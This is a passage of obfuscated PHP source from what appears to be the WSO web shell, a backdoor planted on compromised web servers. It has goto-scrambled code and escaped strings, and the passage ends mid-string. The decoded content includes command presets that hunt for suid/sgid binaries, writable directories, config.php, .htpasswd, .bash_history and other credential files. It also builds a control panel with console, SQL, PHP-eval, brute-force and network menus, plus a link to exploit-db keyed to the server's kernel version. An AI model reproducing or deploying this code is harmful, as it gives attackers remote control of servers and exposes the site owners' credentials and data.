? array_map(
"\x57\x53\117\x73\x74\162\151\160\163\154\141\163\x68\x65\x73",
$array
)
: stripslashes($array);
}
goto M9YJl;
EoPoZ:
if ($os == "\x77\151\156") {
$aliases = [
"\114\x69\163\x74\40\104\x69\162\145\143\x74\x6f\162\x79" =>
"\x64\x69\x72",
"\x46\x69\156\144\40\x69\156\x64\x65\x78\56\160\150\x70\40\x69\x6e\40\x63\x75\162\162\145\x6e\x74\40\144\151\162" =>
"\144\151\x72\40\x2f\x73\x20\x2f\167\x20\x2f\x62\x20\151\156\x64\x65\x78\56\160\x68\160",
"\x46\x69\x6e\144\x20\x2a\x63\x6f\156\146\x69\x67\52\56\160\150\160\x20\x69\x6e\x20\143\165\x72\x72\x65\x6e\164\40\x64\151\x72" =>
"\144\151\162\x20\x2f\x73\x20\x2f\167\x20\57\x62\x20\x2a\x63\x6f\156\x66\151\147\x2a\56\160\x68\x70",
"\x53\150\157\167\40\141\143\x74\x69\166\x65\40\143\157\156\156\145\x63\x74\x69\157\x6e\x73" =>
"\x6e\x65\x74\163\x74\141\164\40\55\141\156",
"\x53\x68\x6f\x77\x20\x72\x75\156\x6e\151\x6e\x67\x20\x73\145\x72\x76\151\143\x65\163" =>
"\156\x65\x74\40\163\x74\141\x72\x74",
"\x55\163\x65\162\x20\x61\x63\x63\157\165\x6e\164\163" =>
"\x6e\145\164\40\x75\x73\145\162",
"\123\150\x6f\167\x20\x63\157\155\160\x75\164\145\x72\x73" =>
"\156\145\x74\x20\166\151\145\x77",
"\101\122\120\40\124\141\142\154\x65" => "\x61\162\x70\40\x2d\141",
"\111\120\x20\103\x6f\x6e\x66\151\147\165\162\141\x74\x69\157\156" =>
"\151\x70\143\157\x6e\x66\x69\x67\x20\x2f\141\x6c\x6c",
];
} else {
$aliases = [
"\114\x69\x73\164\x20\x64\151\162" => "\154\x73\40\x2d\154\x68\141",
"\x6c\x69\x73\x74\x20\146\x69\x6c\x65\x20\x61\164\x74\162\151\x62\165\x74\x65\x73\40\x6f\156\40\141\x20\x4c\151\x6e\165\x78\40\x73\x65\x63\157\156\144\40\145\170\164\x65\x6e\x64\x65\x64\x20\x66\151\x6c\145\x20\x73\171\163\x74\145\155" =>
"\x6c\x73\x61\164\164\x72\40\55\x76\x61",
"\163\x68\157\167\x20\157\160\x65\156\x65\x64\x20\160\x6f\x72\164\x73" =>
"\x6e\x65\x74\163\164\x61\164\x20\x2d\141\156\x20\174\40\x67\x72\x65\160\x20\x2d\151\40\154\x69\x73\x74\x65\x6e",
"\160\162\x6f\143\x65\x73\163\x20\x73\164\141\164\x75\163" =>
"\x70\x73\x20\141\x75\x78",
"\106\151\x6e\144" => "",
"\146\x69\x6e\x64\x20\141\154\x6c\x20\x73\x75\x69\x64\40\x66\151\154\x65\163" =>
"\x66\151\156\x64\40\x2f\40\x2d\x74\171\160\145\x20\146\40\55\x70\x65\162\x6d\x20\x2d\x30\x34\x30\60\60\x20\x2d\154\163",
"\146\151\156\144\x20\x73\x75\x69\x64\x20\146\x69\154\145\163\x20\x69\x6e\x20\x63\165\x72\162\x65\156\164\40\144\x69\162" =>
"\146\151\156\144\x20\56\40\x2d\x74\x79\160\x65\40\x66\x20\55\x70\x65\162\x6d\x20\55\60\64\60\60\60\x20\55\154\x73",
"\x66\151\156\144\x20\141\154\154\x20\163\x67\x69\144\40\x66\151\154\x65\x73" =>
"\146\x69\x6e\x64\x20\x2f\40\x2d\164\x79\160\x65\40\146\x20\x2d\160\x65\162\155\40\x2d\x30\62\x30\60\60\40\55\154\163",
"\146\x69\156\144\40\163\x67\151\144\40\x66\151\x6c\145\x73\40\x69\156\40\143\165\x72\x72\145\x6e\164\40\x64\151\162" =>
"\146\151\x6e\x64\40\x2e\40\x2d\164\x79\x70\x65\40\x66\40\x2d\x70\x65\162\155\40\55\x30\x32\x30\x30\60\x20\55\x6c\x73",
"\146\x69\156\144\40\x63\x6f\x6e\x66\151\x67\x2e\151\156\143\x2e\x70\x68\160\40\x66\x69\x6c\x65\163" =>
"\x66\151\x6e\x64\40\57\x20\x2d\x74\171\x70\x65\40\x66\40\55\156\x61\x6d\145\x20\x63\157\156\x66\x69\147\x2e\151\x6e\143\56\x70\150\x70",
"\x66\151\x6e\x64\40\x63\x6f\156\x66\151\147\52\x20\146\151\x6c\x65\x73" =>
"\146\x69\156\x64\40\57\x20\x2d\x74\x79\x70\x65\40\146\40\x2d\156\141\x6d\145\x20\42\x63\x6f\156\x66\x69\x67\52\42",
"\x66\151\156\144\x20\143\157\156\146\x69\147\52\40\146\151\154\145\x73\x20\x69\156\40\x63\165\x72\162\145\156\164\40\144\151\162" =>
"\x66\151\156\x64\x20\x2e\40\x2d\x74\x79\160\145\40\146\40\55\156\x61\155\x65\x20\x22\143\x6f\156\x66\x69\147\x2a\x22",
"\146\x69\x6e\x64\x20\x61\154\154\40\x77\x72\151\x74\x61\142\154\145\40\x66\157\154\x64\x65\162\163\40\141\156\144\40\x66\151\154\x65\x73" =>
"\x66\151\x6e\144\40\x2f\x20\x2d\160\145\x72\x6d\x20\x2d\x32\40\x2d\154\163",
"\146\151\x6e\144\x20\x61\x6c\x6c\40\167\162\151\x74\x61\x62\154\x65\40\146\x6f\154\144\x65\x72\x73\40\141\156\144\x20\x66\151\154\x65\163\x20\151\156\40\x63\x75\x72\x72\145\156\164\x20\x64\151\x72" =>
"\146\x69\x6e\x64\40\x2e\x20\x2d\x70\x65\x72\155\x20\x2d\x32\x20\55\154\163",
"\x66\x69\156\x64\40\x61\154\154\x20\x73\x65\x72\x76\151\x63\145\x2e\160\167\x64\40\146\151\154\x65\x73" =>
"\146\151\156\x64\x20\57\40\x2d\164\x79\160\145\40\146\40\x2d\x6e\141\155\x65\40\x73\x65\x72\166\151\x63\x65\x2e\160\x77\x64",
"\146\151\156\144\x20\163\145\162\166\151\143\145\x2e\160\167\144\x20\146\x69\x6c\145\x73\x20\x69\156\40\143\x75\x72\162\145\x6e\x74\x20\x64\x69\162" =>
"\x66\151\x6e\x64\40\x2e\40\x2d\x74\171\x70\145\x20\146\40\55\156\x61\x6d\145\40\x73\x65\162\x76\151\143\145\56\160\167\144",
"\146\151\x6e\144\x20\x61\154\x6c\40\x2e\x68\x74\x70\141\163\163\167\x64\40\146\x69\154\x65\x73" =>
"\x66\x69\x6e\144\40\x2f\40\x2d\x74\171\x70\x65\x20\146\x20\55\156\141\x6d\145\x20\56\150\x74\x70\x61\163\163\167\x64",
"\146\151\156\x64\x20\x2e\x68\x74\160\x61\163\163\167\144\40\x66\151\x6c\145\x73\40\151\156\40\x63\165\x72\x72\x65\x6e\164\x20\144\151\x72" =>
"\x66\151\x6e\x64\x20\56\40\55\x74\171\160\x65\x20\146\40\x2d\x6e\141\155\x65\x20\x2e\150\x74\x70\x61\x73\x73\167\144",
"\146\151\156\x64\x20\x61\154\x6c\x20\x2e\x62\x61\163\x68\137\150\x69\163\164\x6f\162\171\x20\146\x69\154\145\163" =>
"\x66\x69\156\144\x20\x2f\x20\55\x74\x79\160\x65\40\146\x20\x2d\156\141\x6d\x65\x20\x2e\142\141\x73\150\137\x68\151\x73\164\x6f\162\171",
"\146\x69\x6e\x64\x20\56\142\141\x73\150\137\150\x69\163\x74\157\x72\171\40\x66\151\154\x65\x73\x20\151\156\x20\143\165\162\x72\x65\x6e\164\x20\144\x69\162" =>
"\146\x69\156\144\x20\56\x20\x2d\164\x79\160\x65\x20\146\40\x2d\156\x61\x6d\145\40\56\x62\141\163\150\x5f\150\151\x73\x74\x6f\162\171",
"\x66\151\156\144\40\x61\x6c\154\x20\56\x66\x65\164\x63\150\x6d\x61\x69\x6c\x72\143\x20\146\x69\154\145\163" =>
"\x66\x69\x6e\x64\40\x2f\x20\55\x74\171\160\x65\x20\146\x20\x2d\156\x61\x6d\x65\40\56\x66\x65\x74\143\150\155\x61\x69\x6c\x72\x63",
"\146\151\x6e\x64\x20\x2e\x66\x65\164\x63\x68\155\141\151\154\x72\143\40\x66\151\x6c\x65\x73\40\x69\x6e\x20\143\165\x72\162\x65\156\x74\x20\144\x69\x72" =>
"\146\x69\156\144\x20\x2e\40\x2d\x74\171\160\145\40\x66\x20\x2d\x6e\141\x6d\x65\x20\x2e\x66\145\x74\143\x68\x6d\141\x69\x6c\162\143",
"\x4c\157\143\141\164\x65" => "",
"\x6c\157\x63\141\164\145\40\150\164\x74\160\x64\x2e\143\x6f\x6e\x66\40\146\151\x6c\145\x73" =>
"\154\157\x63\x61\x74\x65\40\x68\164\164\160\x64\x2e\x63\157\156\x66",
"\x6c\x6f\143\141\164\145\x20\166\x68\157\x73\x74\x73\x2e\x63\157\156\x66\x20\146\x69\x6c\x65\x73" =>
"\154\157\143\141\164\145\40\166\150\157\163\164\163\x2e\143\x6f\156\x66",
"\154\157\x63\x61\164\x65\x20\x70\x72\157\146\x74\160\x64\56\143\x6f\156\146\x20\x66\x69\154\x65\163" =>
"\154\x6f\143\141\x74\145\40\x70\162\157\146\164\x70\144\x2e\x63\x6f\x6e\x66",
"\154\x6f\x63\x61\x74\x65\x20\x70\163\171\x62\156\143\x2e\143\x6f\156\x66\40\x66\151\154\145\x73" =>
"\154\x6f\143\x61\x74\x65\x20\160\163\171\x62\156\x63\56\x63\x6f\x6e\146",
"\x6c\x6f\143\141\x74\145\x20\155\x79\56\x63\x6f\156\x66\40\x66\x69\x6c\x65\163" =>
"\154\157\143\141\164\145\40\155\171\x2e\x63\157\x6e\x66",
"\x6c\x6f\x63\x61\x74\x65\x20\141\x64\x6d\151\x6e\x2e\160\150\160\40\146\151\x6c\145\163" =>
"\x6c\157\x63\x61\164\x65\40\141\144\155\x69\x6e\56\160\150\x70",
"\x6c\157\143\x61\164\145\x20\x63\146\147\56\160\150\x70\x20\x66\x69\154\x65\x73" =>
"\x6c\x6f\x63\x61\164\145\x20\x63\x66\147\56\160\x68\x70",
"\154\157\143\141\x74\145\40\x63\x6f\x6e\x66\56\160\150\x70\40\x66\151\154\x65\163" =>
"\154\x6f\x63\141\x74\x65\40\143\157\x6e\146\56\160\x68\x70",
"\154\x6f\143\141\164\x65\x20\143\157\x6e\x66\151\x67\56\x64\141\x74\x20\146\x69\154\x65\163" =>
"\x6c\157\x63\x61\x74\x65\40\x63\x6f\156\x66\151\x67\x2e\144\141\x74",
"\x6c\157\x63\x61\164\x65\40\x63\157\156\146\151\x67\56\160\x68\x70\40\146\x69\x6c\x65\163" =>
"\x6c\x6f\x63\x61\164\145\x20\143\x6f\x6e\146\x69\147\x2e\160\150\x70",
"\154\157\143\141\x74\145\40\143\157\156\x66\151\x67\56\151\156\143\x20\146\151\154\145\163" =>
"\x6c\157\143\141\164\x65\x20\143\x6f\156\x66\151\147\x2e\151\x6e\x63",
"\x6c\x6f\143\141\x74\x65\x20\143\x6f\156\146\x69\147\56\x69\156\143\56\160\150\x70" =>
"\x6c\x6f\x63\x61\x74\145\x20\143\157\x6e\146\151\147\56\151\156\x63\56\160\x68\x70",
"\x6c\157\143\141\x74\x65\x20\143\157\156\146\151\147\56\x64\x65\146\141\x75\154\x74\56\160\x68\160\x20\x66\151\x6c\145\163" =>
"\x6c\x6f\x63\141\164\x65\x20\143\157\156\x66\151\x67\56\x64\x65\146\141\x75\154\164\x2e\x70\x68\160",
"\x6c\157\x63\x61\164\x65\40\143\157\156\146\151\x67\x2a\40\x66\x69\154\145\x73\x20" =>
"\x6c\157\x63\141\x74\x65\x20\x63\157\x6e\146\151\147",
"\154\157\x63\141\164\x65\x20\56\143\x6f\156\x66\x20\x66\151\x6c\145\163" =>
"\154\x6f\143\141\164\x65\40\x27\x2e\x63\x6f\x6e\146\x27",
"\154\x6f\x63\141\164\x65\40\56\x70\167\144\40\146\151\154\x65\163" =>
"\x6c\157\x63\141\164\x65\x20\47\x2e\x70\167\x64\47",
"\x6c\157\143\141\164\145\x20\x2e\163\161\154\x20\x66\151\154\145\x73" =>
"\x6c\x6f\x63\x61\x74\145\x20\x27\56\x73\161\x6c\x27",
"\154\x6f\143\x61\x74\x65\40\56\x68\164\x70\141\x73\163\x77\144\x20\x66\151\154\145\163" =>
"\154\x6f\x63\x61\164\x65\x20\x27\x2e\150\164\160\x61\x73\163\167\x64\x27",
"\x6c\x6f\143\141\x74\x65\40\x2e\x62\141\163\x68\x5f\x68\x69\163\x74\157\x72\171\40\x66\151\x6c\145\163" =>
"\154\x6f\143\141\x74\x65\40\47\x2e\x62\x61\x73\x68\x5f\x68\151\x73\164\157\x72\171\47",
"\154\x6f\143\141\x74\x65\40\x2e\155\x79\163\161\x6c\x5f\x68\151\x73\164\x6f\162\171\x20\x66\x69\154\x65\163" =>
"\x6c\x6f\x63\x61\164\x65\x20\47\x2e\155\171\163\x71\154\137\150\151\x73\x74\x6f\162\171\x27",
"\154\x6f\x63\x61\x74\145\40\x2e\146\145\164\x63\x68\x6d\x61\x69\154\x72\143\x20\146\151\x6c\145\163" =>
"\154\157\143\141\164\145\40\x27\56\x66\145\164\143\x68\155\141\x69\x6c\162\143\47",
"\154\157\x63\x61\x74\145\x20\x62\x61\143\153\x75\x70\40\146\x69\x6c\145\163" =>
"\x6c\157\143\x61\164\145\x20\x62\x61\x63\x6b\x75\x70",
"\154\x6f\143\x61\x74\x65\40\144\x75\x6d\160\x20\x66\151\154\145\163" =>
"\154\157\x63\x61\x74\145\40\x64\x75\155\160",
"\154\157\143\x61\164\145\x20\160\x72\x69\x76\x20\146\x69\154\145\163" =>
"\154\x6f\143\141\164\x65\x20\x70\x72\x69\166",
];
}
goto MrsTM;
Cjo7J:
$color = "\x23\144\x66\65";
goto LNmAT;
ocXfq:
$_COOKIE = WSOstripslashes($_COOKIE);
goto Qn_9k;
dPSqc:
if (empty($_POST["\x61"])) {
if (
isset($default_action) &&
function_exists("\141\x63\x74\151\157\156" . $default_action)
) {
$_POST["\141"] = $default_action;
} else {
$_POST["\141"] = "\123\145\143\111\x6e\x66\x6f";
}
}
goto j2Rfu;
fj9OS:
if ($argc == 3) {
$_POST = unserialize(base64_decode($argv[1]));
$_SERVER = unserialize(base64_decode($argv[2]));
}
goto GFRHq;
MrsTM:
function wsoHeader()
{
goto E9rcc;
FKql5:
echo "\74\164\x61\142\x6c\x65\x20\x63\x6c\x61\163\x73\x3d\151\156\146\x6f\40\143\145\154\x6c\160\141\144\144\x69\156\x67\75\x33\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\x69\156\147\75\x30\40\x77\x69\144\x74\x68\x3d\x31\60\60\45\x3e\x3c\x74\x72\x3e\x3c\164\144\x20\167\x69\x64\164\x68\75\61\x3e\x3c\163\160\141\156\76\x55\x6e\x61\155\145\x3a\x3c\x62\162\76\x55\x73\145\x72\72\x3c\x62\162\x3e\x50\x68\160\72\x3c\142\162\x3e\x48\x64\x64\72\x3c\142\x72\76\103\x77\x64\x3a" .
($GLOBALS["\x6f\163"] == "\x77\151\x6e"
? "\x3c\x62\x72\76\x44\x72\151\x76\x65\163\x3a"
: "") .
"\74\x2f\x73\160\141\156\x3e\x3c\57\x74\x64\76" .
"\x3c\164\x64\x3e\74\x6e\157\142\x72\76" .
substr(@php_uname(), 0, 120) .
"\x20\x3c\141\40\x68\x72\x65\146\x3d\x22" .
$explink .
"\x22\40\164\141\x72\x67\145\x74\x3d\137\x62\x6c\x61\156\153\76\x5b\x65\x78\x70\154\157\x69\x74\x2d\x64\142\56\143\157\155\135\x3c\x2f\x61\76\74\x2f\x6e\157\x62\x72\x3e\74\x62\162\x3e" .
$uid .
"\x20\50\40" .
$user .
"\40\x29\x20\74\x73\x70\x61\156\76\107\162\x6f\165\160\x3a\74\57\x73\160\x61\x6e\76\40" .
$gid .
"\40\50\40" .
$group .
"\x20\51\x3c\x62\x72\x3e" .
@phpversion() .
"\x20\74\x73\160\141\x6e\x3e\x53\x61\146\x65\x20\x6d\157\x64\x65\x3a\74\x2f\163\160\x61\x6e\x3e\40" .
($GLOBALS["\163\141\x66\145\x5f\155\157\x64\145"]
? "\74\x66\157\156\164\40\x63\x6f\x6c\x6f\x72\x3d\x72\x65\x64\76\117\116\74\57\x66\157\156\x74\x3e"
: "\x3c\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\75\x67\x72\145\x65\x6e\76\74\142\x3e\x4f\106\106\x3c\x2f\142\76\74\x2f\146\x6f\156\x74\76") .
"\40\x3c\x61\x20\x68\x72\145\x66\x3d\x23\x20\x6f\156\143\x6c\x69\x63\153\x3d\x22\147\x28\x27\120\x68\160\47\54\156\x75\154\x6c\x2c\x27\47\54\x27\x69\x6e\x66\157\47\51\x22\x3e\x5b\40\x70\x68\x70\x69\156\146\x6f\x20\135\74\57\141\76\40\x3c\163\160\141\x6e\76\104\x61\x74\x65\x74\151\x6d\145\x3a\x3c\57\x73\160\141\156\76\40" .
date("\131\55\x6d\55\144\x20\x48\72\x69\72\163") .
"\74\142\162\76" .
wsoViewSize($totalSpace) .
"\x20\74\x73\x70\x61\x6e\x3e\106\x72\145\x65\72\x3c\x2f\163\160\x61\x6e\76\x20" .
wsoViewSize($freeSpace) .
"\x20\50" .
(int) (($freeSpace / $totalSpace) * 100) .
"\45\x29\x3c\x62\x72\76" .
$cwd_links .
"\x20" .
wsoPermsColor($GLOBALS["\x63\167\x64"]) .
"\x20\74\x61\40\150\x72\145\146\75\x23\40\157\x6e\x63\154\x69\143\153\75\x22\x67\50\47\x46\151\x6c\145\163\x4d\141\x6e\47\54\47" .
$GLOBALS["\x68\157\155\x65\137\143\x77\144"] .
"\47\x2c\x27\x27\54\47\47\54\47\x27\x29\x22\x3e\133\x20\150\157\155\145\x20\x5d\x3c\57\x61\76\74\x62\x72\76" .
$drives .
"\x3c\57\x74\x64\76" .
"\x3c\164\x64\40\x77\151\x64\x74\x68\75\x31\x20\x61\154\151\x67\156\x3d\x72\151\x67\x68\164\x3e\74\x6e\157\x62\x72\x3e\x3c\163\145\x6c\x65\x63\x74\x20\x6f\156\x63\x68\x61\156\147\145\x3d\x22\147\x28\x6e\x75\154\154\x2c\x6e\x75\154\154\54\156\165\x6c\x6c\x2c\156\x75\154\154\54\x6e\165\x6c\x6c\x2c\x74\x68\151\163\56\x76\141\154\x75\145\x29\x22\76\x3c\157\x70\x74\x67\162\x6f\x75\160\40\154\141\x62\x65\154\x3d\x22\120\x61\x67\145\x20\143\150\x61\x72\x73\x65\x74\x22\x3e" .
$opt_charsets .
"\74\57\157\x70\164\147\162\x6f\165\160\x3e\74\57\163\x65\x6c\145\143\164\76\74\142\x72\x3e\74\x73\x70\141\156\76\x53\x65\x72\166\x65\x72\x20\x49\x50\x3a\x3c\57\163\160\141\x6e\76\74\142\x72\x3e" .
@$_SERVER["\123\105\x52\126\105\x52\x5f\101\x44\x44\x52"] .
"\x3c\142\x72\x3e\x3c\163\x70\x61\x6e\76\103\154\151\x65\156\164\40\x49\x50\x3a\x3c\57\163\160\141\156\x3e\x3c\142\x72\76" .
$_SERVER["\122\105\x4d\117\x54\105\137\x41\x44\x44\122"] .
"\x3c\x2f\x6e\x6f\x62\162\76\74\x2f\164\x64\x3e\x3c\57\164\x72\x3e\x3c\57\164\141\x62\154\x65\x3e" .
"\x3c\x74\141\142\x6c\145\x20\x73\x74\171\154\x65\75\x22\x62\x6f\x72\144\x65\162\55\x74\x6f\160\x3a\62\x70\x78\40\163\157\x6c\151\144\x20\x23\63\63\x33\73\x22\40\143\x65\x6c\154\160\141\x64\144\x69\156\x67\75\x33\x20\x63\x65\x6c\x6c\163\x70\x61\x63\x69\156\147\x3d\60\x20\167\151\x64\x74\150\x3d\61\x30\60\x25\76\x3c\x74\162\76" .
$menu .
"\74\x2f\164\162\76\x3c\x2f\x74\141\142\154\145\x3e\x3c\x64\151\x76\40\x73\x74\171\154\145\x3d\x22\155\x61\162\x67\151\156\x3a\x35\42\x3e";
goto RzURU;
M4wyI:
$m = [
"\x53\145\x63\56\40\x49\x6e\x66\x6f" => "\x53\145\x63\x49\x6e\x66\157",
"\x46\x69\x6c\145\163" => "\106\x69\154\145\163\115\141\x6e",
"\103\x6f\156\163\157\154\145" => "\x43\157\x6e\x73\157\x6c\145",
"\123\161\x6c" => "\123\x71\154",
"\120\x68\160" => "\120\x68\x70",
"\x53\164\x72\x69\x6e\147\40\x74\157\x6f\154\163" =>
"\123\x74\x72\151\156\x67\x54\x6f\157\x6c\x73",
"\102\x72\x75\164\x65\146\157\162\143\x65" =>
"\102\162\165\x74\x65\x66\157\x72\143\145",
"\x4e\145\164\x77\157\x72\x6b" => "\116\x65\164\167\157\x72\153",
];
goto JIPap;
XR0lk:
$totalSpace = $totalSpace ? $totalSpace : 1;
goto gDdS4;
QoI2U:
$drives = "";
goto dJUUJ;
E9rcc:
if (empty($_POST["\143\150\141\x72\x73\145\164"])) {
$_POST["\x63\x68\x61\x72\163\145\164"] =
$GLOBALS[
"\144\145\146\141\x75\154\x74\137\143\150\141\x72\x73\x65\x74"
];
}
goto wwJNm;
yWMQp:
$charsets = [
"\125\124\x46\x2d\x38",
"\127\151\x6e\144\x6f\x77\163\55\61\62\65\x31",
"\113\117\x49\70\55\x52",
"\113\x4f\x49\x38\55\x55",
"\x63\x70\70\x36\66",
];
goto QAzn_;
JIPap:
if (!empty($GLOBALS["\x61\x75\164\150\137\x70\x61\x73\x73"])) {
$m["\x4c\x6f\x67\157\x75\164"] = "\x4c\x6f\147\x6f\165\164";
}
goto hedz2;
nmRB7:
echo "\x3c\150\164\155\154\x3e\74\x68\145\141\144\76\74\x6d\145\164\141\x20\x68\x74\164\160\55\x65\x71\x75\x69\x76\x3d\x27\x43\x6f\156\164\x65\156\x74\x2d\x54\171\160\145\x27\40\143\157\x6e\x74\145\x6e\x74\75\x27\x74\x65\170\x74\x2f\x68\x74\x6d\x6c\x3b\40\x63\x68\x61\x72\x73\x65\x74\75" .
$_POST["\143\x68\141\162\163\x65\164"] .
"\x27\76\x3c\x74\x69\x74\154\x65\x3e" .
$_SERVER["\110\124\x54\x50\137\110\117\x53\x54"] .
"\x20\x2d\40\x57\x53\117\40" .
WSO_VERSION .
"\74\x2f\x74\151\164\x6c\145\x3e\xd\12\x3c\163\164\x79\154\x65\x3e\15\xa\x62\x6f\144\x79\173\x62\141\143\153\x67\162\x6f\165\156\144\55\143\157\x6c\x6f\x72\x3a\x23\x34\x34\x34\x3b\x63\157\154\157\162\72\x23\x65\61\145\x31\145\x31\x3b\x7d\15\xa\142\x6f\x64\x79\x2c\x74\144\54\164\150\173\x20\x66\157\156\x74\72\40\71\x70\164\40\114\165\x63\x69\144\141\x2c\x56\145\162\144\x61\x6e\141\73\155\x61\x72\x67\151\156\x3a\x30\73\x76\145\x72\164\x69\143\141\154\x2d\141\154\x69\147\156\72\164\x6f\x70\73\143\157\x6c\157\x72\x3a\x23\x65\61\x65\x31\145\x31\x3b\x20\x7d\xd\xa\x74\x61\142\x6c\145\56\151\156\x66\x6f\173\40\143\157\x6c\157\x72\72\43\x66\146\146\73\x62\x61\143\x6b\147\x72\x6f\165\x6e\x64\x2d\x63\157\x6c\x6f\x72\72\43\62\62\62\x3b\x20\x7d\15\xa\163\x70\141\156\x2c\150\61\x2c\141\173\40\x63\157\x6c\157\162\x3a\40{$color}\40\x21\x69\155\x70\157\x72\x74\141\156\164\73\x20\x7d\xd\12\163\x70\141\x6e\173\40\x66\x6f\156\x74\55\167\x65\151\147\x68\164\x3a\x20\142\x6f\154\144\145\x72\x3b\40\175\xd\12\x68\61\173\40\x62\157\162\x64\145\x72\55\154\145\146\x74\72\x35\160\x78\40\163\x6f\154\151\x64\x20{$color}\73\160\x61\x64\144\x69\156\147\x3a\40\62\x70\x78\40\x35\x70\170\x3b\146\157\156\x74\x3a\40\61\x34\x70\x74\x20\x56\145\x72\x64\141\156\141\x3b\142\x61\x63\153\147\162\157\x75\x6e\144\55\x63\157\154\157\x72\x3a\43\62\x32\x32\73\155\x61\x72\x67\151\x6e\x3a\x30\x70\x78\x3b\40\175\xd\12\144\x69\166\56\x63\157\156\164\x65\x6e\x74\173\40\160\141\144\144\151\156\147\x3a\40\x35\160\x78\73\155\141\162\147\151\156\55\154\145\146\164\x3a\x35\160\x78\73\x62\141\x63\x6b\147\162\157\165\156\144\55\143\157\154\157\162\x3a\x23\x33\x33\x33\x3b\40\175\xd\xa\141\173\40\x74\x65\170\x74\55\x64\145\143\x6f\162\x61\x74\x69\157\x6e\x3a\x6e\157\156\145\73\x20\x7d\xd\xa\x61\x3a\150\157\x76\145\162\173\40\x74\145\170\x74\x2d\144\x65\x63\157\x72\141\164\151\157\156\x3a\165\156\x64\145\162\x6c\x69\x6e\x65\x3b\40\175\15\xa\x2e\155\154\x31\173\40\x62\x6f\x72\x64\145\x72\x3a\61\160\170\40\163\157\x6c\x69\144\40\x23\64\64\x34\x3b\x70\x61\x64\x64\151\156\147\72\65\160\170\x3b\x6d\141\x72\147\x69\x6e\x3a\x30\x3b\x6f\166\x65\162\x66\154\157\x77\x3a\40\141\x75\164\157\x3b\x20\x7d\15\12\x2e\x62\x69\147\141\162\x65\141\173\40\x77\x69\x64\x74\x68\72\x31\60\60\45\x3b\x68\145\151\x67\150\x74\72\63\60\60\160\170\x3b\x20\175\xd\xa\x69\156\x70\x75\164\x2c\164\x65\170\x74\141\162\x65\x61\54\163\145\154\x65\x63\x74\173\x20\x6d\141\x72\147\151\x6e\72\60\73\x63\157\154\x6f\162\x3a\43\x66\146\146\73\142\141\143\x6b\147\162\x6f\x75\x6e\144\55\x63\x6f\x6c\157\x72\x3a\x23\65\65\x35\x3b\142\157\x72\x64\145\x72\x3a\61\160\x78\40\x73\157\x6c\151\144\40{$color}\x3b\x20\x66\157\156\164\72\x20\x39\x70\164\40\115\x6f\156\157\x73\160\141\x63\145\x2c\47\103\157\x75\162\151\145\x72\40\116\x65\167\x27\73\40\175\xd\12\x66\157\162\155\x7b\40\155\141\x72\x67\x69\x6e\x3a\x30\160\170\73\x20\x7d\15\xa\43\164\x6f\x6f\154\163\124\x62\154\x7b\x20\x74\x65\170\x74\x2d\141\x6c\x69\147\156\72\143\145\x6e\x74\145\162\73\40\x7d\15\xa\56\164\157\x6f\x6c\163\111\x6e\160\173\x20\167\x69\144\164\150\72\x20\63\x30\60\x70\x78\x20\175\15\xa\56\x6d\x61\x69\x6e\x20\x74\x68\173\x74\145\170\164\55\141\x6c\x69\x67\x6e\72\154\x65\146\164\73\x62\141\x63\x6b\147\162\x6f\165\156\144\55\x63\x6f\154\157\162\x3a\43\x35\145\65\x65\x35\x65\73\x7d\xd\xa\56\x6d\141\151\156\40\164\162\72\150\157\166\x65\x72\173\x62\141\143\x6b\x67\x72\x6f\x75\x6e\144\x2d\143\x6f\154\x6f\x72\72\x23\x35\x65\65\145\65\x65\x7d\15\12\x2e\154\x31\173\142\x61\143\x6b\x67\x72\x6f\x75\156\144\x2d\143\157\x6c\x6f\x72\72\43\x34\x34\64\175\15\xa\x2e\x6c\x32\173\x62\141\x63\153\x67\x72\157\x75\156\x64\x2d\x63\x6f\154\x6f\162\x3a\43\x33\63\63\x7d\xd\12\160\162\145\173\146\157\x6e\164\x2d\x66\141\x6d\x69\154\171\72\x43\157\165\162\151\x65\162\x2c\115\157\x6e\157\163\x70\x61\x63\x65\x3b\175\15\12\74\57\163\164\x79\154\145\x3e\15\xa\x3c\x73\x63\x72\x69\x70\164\76\15\xa\40\40\40\40\166\x61\x72\x20\x63\x5f\40\x3d\x20\x27" .
htmlspecialchars($GLOBALS["\143\x77\144"]) .
"\x27\x3b\xd\xa\x20\40\x20\x20\x76\141\x72\40\141\137\40\x3d\x20\x27" .
htmlspecialchars(@$_POST["\x61"]) .
"\x27\xd\12\40\40\x20\x20\x76\141\x72\40\143\x68\141\162\x73\145\164\137\40\x3d\x20\47" .
htmlspecialchars(@$_POST["\x63\150\x61\x72\x73\x65\164"]) .
"\47\x3b\xd\12\x20\x20\40\x20\166\x61\162\40\x70\x31\x5f\x20\75\40\x27" .
(strpos(@$_POST["\x70\x31"], "\12") !== false
? ""
: htmlspecialchars($_POST["\x70\61"], ENT_QUOTES)) .
"\47\x3b\15\12\x20\x20\x20\40\166\x61\162\40\160\62\137\x20\75\40\47" .
(strpos(@$_POST["\x70\62"], "\12") !== false
? ""
: htmlspecialchars($_POST["\x70\x32"], ENT_QUOTES)) .
"\47\73\xd\xa\x20\40\40\x20\166\141\162\40\160\x33\137\40\75\x20\47" .
(strpos(@$_POST["\160\x33"], "\xa") !== false
? ""
: htmlspecialchars($_POST["\160\x33"], ENT_QUOTES)) .
"\x27\73\15\12\40\40\x20\x20\166\x61\x72\40\144\x20\x3d\40\144\x6f\x63\165\x6d\145\x6e\164\73\xd\xa\x9\x66\165\x6e\x63\x74\151\x6f\x6e\x20\x73\145\x74\50\141\54\143\x2c\160\61\54\x70\x32\x2c\160\63\54\143\x68\x61\162\163\145\164\x29\x20\173\15\xa\11\x9\151\146\50\141\x21\75\x6e\165\x6c\x6c\x29\144\56\x6d\x66\x2e\141\56\166\141\x6c\165\145\75\x61\x3b\x65\x6c\163\x65\x20\144\56\155\x66\x2e\x61\56\166\141\154\165\145\75\141\137\73\xd\xa\11\11\151\146\x28\143\x21\75\156\165\x6c\x6c\x29\x64\x2e\x6d\x66\56\143\56\x76\x61\154\165\145\x3d\x63\x3b\x65\x6c\x73\x65\x20\x64\x2e\155\146\56\143\56\166\141\154\165\145\75\143\x5f\x3b\15\12\11\11\x69\146\50\160\61\41\75\x6e\165\154\154\x29\x64\x2e\155\146\x2e\160\61\56\x76\141\x6c\165\145\75\160\x31\73\145\x6c\163\x65\x20\x64\x2e\155\x66\56\160\61\56\166\141\154\165\x65\75\x70\x31\x5f\73\15\xa\11\x9\x69\x66\x28\x70\62\41\75\x6e\165\154\x6c\x29\144\56\155\146\x2e\160\62\56\16